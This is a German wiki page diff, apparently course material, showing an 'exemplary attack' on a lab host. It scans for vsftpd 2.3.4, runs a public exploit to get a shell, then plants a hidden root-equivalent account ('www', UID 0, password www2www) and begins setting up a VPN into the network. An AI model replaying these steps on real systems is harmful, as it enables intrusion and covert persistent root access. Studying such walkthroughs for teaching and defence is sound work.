Exemplarischer Angriff: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 21: Zeile 21:
 
=User anlegen=
 
=User anlegen=
 
*useradd -m -o -u 0 -s /bin/bash -d /var/www www
 
*useradd -m -o -u 0 -s /bin/bash -d /var/www www
 +
*passwd www
 +
Enter new UNIX password: www2www
 +
Retype new UNIX password: www2www
 +
passwd: password updated successfully
  
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
*apt-get install ppp
 
*apt-get install ppp

Version vom 7. Oktober 2021, 15:08 Uhr

Beispiel

  • nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
Nmap scan report for 10.80.100.105
Host is up (0.00056s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Nach Exploit googlen

vsftpd 2.3 4 exploit-db

Exploit finden

Exploit ausführen

  • python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell

Läuft ssh?

  • netstat -lntp | grep 22
tcp6  0      0 :::22   :::*  LISTEN      4360/sshd

User anlegen

  • useradd -m -o -u 0 -s /bin/bash -d /var/www www
  • passwd www
Enter new UNIX password: www2www
Retype new UNIX password: www2www
passwd: password updated successfully

VPN einrichten um Zugriff zum Netz zu erlangen

  • apt-get install ppp